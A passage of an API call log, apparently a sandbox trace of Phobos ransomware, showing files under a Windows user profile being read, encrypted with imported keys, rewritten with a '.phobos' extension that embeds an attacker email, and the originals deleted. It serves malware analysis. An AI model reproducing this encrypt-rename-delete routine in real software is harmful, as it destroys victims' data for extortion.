pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0202.370] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.370] ReadFile (in: hFile=0xfc, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x107e, lpOverlapped=0x0) returned 1 [0202.371] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1080, dwBufLen=0x1080 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1080) returned 1 [0202.371] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1080, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1080, lpOverlapped=0x0) returned 1 [0202.372] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32928) returned 1 [0202.372] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.372] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0202.372] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.372] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0202.372] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.372] CloseHandle (hObject=0xfc) returned 1 [0202.372] CloseHandle (hObject=0x13c) returned 1 [0202.373] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg")) returned 1 [0202.373] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0202.374] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.374] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=237) returned 1 [0202.374] CloseHandle (hObject=0x13c) returned 1 [0202.374] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm")) returned 0x2020 [0202.374] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.374] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.374] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.374] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.374] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.376] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0202.376] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.376] ReadFile (in: hFile=0x13c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xed, lpOverlapped=0x0) returned 1 [0202.377] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0202.377] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0202.378] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32928) returned 1 [0202.378] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.378] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0202.378] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.378] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0202.378] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.378] CloseHandle (hObject=0x13c) returned 1 [0202.378] CloseHandle (hObject=0xfc) returned 1 [0202.378] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm")) returned 1 [0202.379] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0202.379] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.379] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=6381) returned 1 [0202.379] CloseHandle (hObject=0xfc) returned 1 [0202.379] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg")) returned 0x2020 [0202.379] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.379] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.380] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.380] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.380] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0202.380] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.380] ReadFile (in: hFile=0xfc, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x18ed, lpOverlapped=0x0) returned 1 [0202.523] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x18f0, dwBufLen=0x18f0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x18f0) returned 1 [0202.523] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x18f0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x18f0, lpOverlapped=0x0) returned 1 [0202.524] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32928) returned 1 [0202.524] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.524] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0202.524] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.524] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0202.524] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.524] CloseHandle (hObject=0xfc) returned 1 [0202.524] CloseHandle (hObject=0x13c) returned 1 [0202.524] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg")) returned 1 [0202.544] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0202.544] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.545] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=230) returned 1 [0202.545] CloseHandle (hObject=0x13c) returned 1 [0202.545] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm")) returned 0x2020 [0202.545] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.545] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.545] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.545] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.545] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.546] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0202.546] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.546] ReadFile (in: hFile=0x13c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe6, lpOverlapped=0x0) returned 1 [0202.547] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0202.547] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0202.547] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32928) returned 1 [0202.547] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.547] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0202.548] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.548] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0202.548] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.548] CloseHandle (hObject=0x13c) returned 1 [0202.548] CloseHandle (hObject=0xfc) returned 1 [0202.548] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm")) returned 1 [0202.549] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0202.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.549] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=7505) returned 1 [0202.549] CloseHandle (hObject=0xfc) returned 1 [0202.549] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg")) returned 0x2020 [0202.549] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.549] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.549] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.550] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0202.550] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.550] ReadFile (in: hFile=0xfc, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1d51, lpOverlapped=0x0) returned 1 [0202.564] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1d60, dwBufLen=0x1d60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1d60) returned 1 [0202.564] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1d60, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1d60, lpOverlapped=0x0) returned 1 [0202.565] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32928) returned 1 [0202.565] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.565] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0202.565] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.565] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0202.565] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.565] CloseHandle (hObject=0xfc) returned 1 [0202.565] CloseHandle (hObject=0x13c) returned 1 [0202.573] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg")) returned 1 [0202.574] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0202.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.575] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=498) returned 1 [0202.575] CloseHandle (hObject=0x13c) returned 1 [0202.575] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd")) returned 0x2020 [0202.575] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.575] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.575] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.575] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.575] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.576] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32928) returned 1 [0202.576] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.576] ReadFile (in: hFile=0x13c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1f2, lpOverlapped=0x0) returned 1 [0202.576] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x200, dwBufLen=0x200 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x200) returned 1 [0202.577] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x200, lpOverlapped=0x0) returned 1 [0202.577] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0202.577] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.577] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0202.577] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.577] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0202.577] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.577] CloseHandle (hObject=0x13c) returned 1 [0202.578] CloseHandle (hObject=0xfc) returned 1 [0202.578] DeleteFileW 